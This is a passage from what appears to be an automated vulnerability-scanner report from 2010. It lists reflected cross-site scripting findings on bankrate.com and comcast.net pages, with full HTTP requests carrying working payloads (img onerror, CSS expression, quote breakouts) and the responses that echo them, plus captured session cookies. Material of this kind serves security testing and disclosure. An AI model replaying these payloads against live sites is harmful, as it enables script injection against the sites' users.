This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers; CSS expressions are not evaluated in IE8 standards mode or later, so the payload demonstrates the attribute breakout rather than a cross-browser exploit.

Request

GET /finance/auto/gas-savers-still-getting-fed-tax-credit.aspx?e7dac"style%3d"x%3aexpression(alert(1))"881260241e5=1 HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Servername: d-brmweb02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 1.7.0
Content-Type: text/html; charset=utf-8
Cache-Control: private, max-age=900
Date: Sun, 19 Dec 2010 18:09:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71334


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link type="text/css"
...[SNIP]...
<link rel="canonical" href="http://www.bankrate.com/finance/auto/gas-savers-still-getting-fed-tax-credit.aspx?e7dac"style="x:expression(alert(1))"881260241e5=1" />
...[SNIP]...

2.134. http://www.comcast.net/articles/entertainment-eonline/20101219/b217076/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/entertainment-eonline/20101219/b217076/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5ba35<img%20src%3da%20onerror%3dalert(1)>f7f7658c830 was submitted in the REST URL parameter 2. This input was echoed as 5ba35<img src=a onerror=alert(1)>f7f7658c830 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/entertainment-eonline5ba35<img%20src%3da%20onerror%3dalert(1)>f7f7658c830/20101219/b217076/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:17 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:17 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='entertainment' subchannel'eonline5ba35<img src=a onerror=alert(1)>f7f7658c830'</h2>
...[SNIP]...

2.135. http://www.comcast.net/articles/entertainment-movies/20101217/US.People.Randy.Quaid/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/entertainment-movies/20101217/US.People.Randy.Quaid/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3514c<img%20src%3da%20onerror%3dalert(1)>4bfe6550562 was submitted in the REST URL parameter 2. This input was echoed as 3514c<img src=a onerror=alert(1)>4bfe6550562 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/entertainment-movies3514c<img%20src%3da%20onerror%3dalert(1)>4bfe6550562/20101217/US.People.Randy.Quaid/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:19 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:19 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='entertainment' subchannel'movies3514c<img src=a onerror=alert(1)>4bfe6550562'</h2>
...[SNIP]...

2.136. http://www.comcast.net/articles/entertainment/20090708/entertainment.slideshows.001/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/entertainment/20090708/entertainment.slideshows.001/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7f023<img%20src%3da%20onerror%3dalert(1)>cfb7aba146 was submitted in the REST URL parameter 2. This input was echoed as 7f023<img src=a onerror=alert(1)>cfb7aba146 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/entertainment7f023<img%20src%3da%20onerror%3dalert(1)>cfb7aba146/20090708/entertainment.slideshows.001/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:21 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:21 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='entertainment7f023<img src=a onerror=alert(1)>cfb7aba146' subchannel'home'</h2>
...[SNIP]...

2.137. http://www.comcast.net/articles/entertainment/20101219/AS.Fiji.Oprah.Winfrey/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/entertainment/20101219/AS.Fiji.Oprah.Winfrey/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1c9ac<img%20src%3da%20onerror%3dalert(1)>8179713037 was submitted in the REST URL parameter 2. This input was echoed as 1c9ac<img src=a onerror=alert(1)>8179713037 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/entertainment1c9ac<img%20src%3da%20onerror%3dalert(1)>8179713037/20101219/AS.Fiji.Oprah.Winfrey/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:21 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:21 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='entertainment1c9ac<img src=a onerror=alert(1)>8179713037' subchannel'home'</h2>
...[SNIP]...

2.138. http://www.comcast.net/articles/sports-boxing/20101219/BOX.Pascal.Hopkins/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/sports-boxing/20101219/BOX.Pascal.Hopkins/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9b8ac<img%20src%3da%20onerror%3dalert(1)>b442b71f699 was submitted in the REST URL parameter 2. This input was echoed as 9b8ac<img src=a onerror=alert(1)>b442b71f699 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/sports-boxing9b8ac<img%20src%3da%20onerror%3dalert(1)>b442b71f699/20101219/BOX.Pascal.Hopkins/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:46 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:46 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56495

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='sports' subchannel'boxing9b8ac<img src=a onerror=alert(1)>b442b71f699'</h2>
...[SNIP]...

2.139. http://www.comcast.net/articles/sports-boxing/20101219/BOX.Pascal.Hopkins/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-boxing/20101219/BOX.Pascal.Hopkins/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f67ef'%3bfefd803c823 was submitted in the REST URL parameter 2. This input was echoed as f67ef';fefd803c823 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-boxingf67ef'%3bfefd803c823/20101219/BOX.Pascal.Hopkins/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:42 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:42 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
/', 'script>'
       ].join(''));
       if (parseFloat(navigator.appVersion) == 0) {
           var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_sx.ads/',
               edata,
               'comcast.net/sports/boxingf67ef';fefd803c823/',
               '@x17',
               randomNumber
           );
           document.write([
               '<iframe ',
               'width="300" ',
               'height="250" ',
               'marginwidth="0" ',
               'marginheight="0" ',
               'hspace="0" ',
               'vspace="0" '
...[SNIP]...

2.140. http://www.comcast.net/articles/sports-boxing/20101219/BOX.Pascal.Hopkins/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-boxing/20101219/BOX.Pascal.Hopkins/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2a02"%3bc6b15b7f637 was submitted in the REST URL parameter 2. This input was echoed as e2a02";c6b15b7f637 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-boxinge2a02"%3bc6b15b7f637/20101219/BOX.Pascal.Hopkins/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:40 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:40 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:40 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
sAd();
   }
   
   function renderOasAd(){
       var minNum = 10000000, maxNum = 99999999;
       var randomNumber = Math.round(Math.random()*(maxNum-minNum))+minNum;
       
       var oas_ad_path = "comcast.net/sports/boxinge2a02";c6b15b7f637/";
               
       var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_jx.ads/',
           edata,
           oas_ad_path,
           '@x17',
           randomNumber
       );
       document.write("<div id='variable_adholder'>
...[SNIP]...

2.141. http://www.comcast.net/articles/sports-cbk/20101218/T25-USC-Kansas/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-cbk/20101218/T25-USC-Kansas/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30dd3"%3b57c65471a56 was submitted in the REST URL parameter 2. This input was echoed as 30dd3";57c65471a56 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-cbk30dd3"%3b57c65471a56/20101218/T25-USC-Kansas/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:44 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
rOasAd();
   }
   
   function renderOasAd(){
       var minNum = 10000000, maxNum = 99999999;
       var randomNumber = Math.round(Math.random()*(maxNum-minNum))+minNum;
       
       var oas_ad_path = "comcast.net/sports/cbk30dd3";57c65471a56/";
               
       var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_jx.ads/',
           edata,
           oas_ad_path,
           '@x17',
           randomNumber
       );
       document.write("<div id='variable_adholder'>
...[SNIP]...

2.142. http://www.comcast.net/articles/sports-cbk/20101218/T25-USC-Kansas/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.comcast.net
Path:   /articles/sports-cbk/20101218/T25-USC-Kansas/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da67d'%3bde5beb5d510 was submitted in the REST URL parameter 2. This input was echoed as da67d';de5beb5d510 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/sports-cbkda67d'%3bde5beb5d510/20101218/T25-USC-Kansas/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:45 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:45 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
</', 'script>'
       ].join(''));
       if (parseFloat(navigator.appVersion) == 0) {
           var ad_url = gau('http://oascentral.comcast.net/RealMedia/ads/adstream_sx.ads/',
               edata,
               'comcast.net/sports/cbkda67d';de5beb5d510/',
               '@x17',
               randomNumber
           );
           document.write([
               '<iframe ',
               'width="300" ',
               'height="250" ',
               'marginwidth="0" ',
               'marginheight="0" ',
               'hspace="0" ',
               'vspace="0" '
...[SNIP]...

2.143. http://www.comcast.net/articles/sports-cbk/20101218/T25-USC-Kansas/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/sports-cbk/20101218/T25-USC-Kansas/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7d8b0<img%20src%3da%20onerror%3dalert(1)>4a28518cd5 was submitted in the REST URL parameter 2. This input was echoed as 7d8b0<img src=a onerror=alert(1)>4a28518cd5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/sports-cbk7d8b0<img%20src%3da%20onerror%3dalert(1)>4a28518cd5/20101218/T25-USC-Kansas/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; xuc=c=2; fsr.a=1292781877747; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:18:50 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:23:50 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:18:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

   <meta ht
...[SNIP]...
<h2>Categories Mariano item.id="home" channel='sports' subchannel'cbk7d8b0<img src=a onerror=alert(1)>4a28518cd5'</h2>
...[SNIP]...

2.144. http://www.comcast.net/articles/sports-mlb/20101219/wise-greinketraded/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /articles/sports-mlb/20101219/wise-greinketraded/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 72ecb<img%20src%3da%20onerror%3dalert(1)>ee671481b9b was submitted in the REST URL parameter 2. This input was echoed as 72ecb<img src=a onerror=alert(1)>ee671481b9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /articles/sports-mlb72ecb<img%20src%3da%20onerror%3dalert(1)>ee671481b9b/20101219/wise-greinketraded/ HTTP/1.1
Host: www.comcast.net
Accept: */*
Accept-Language: en
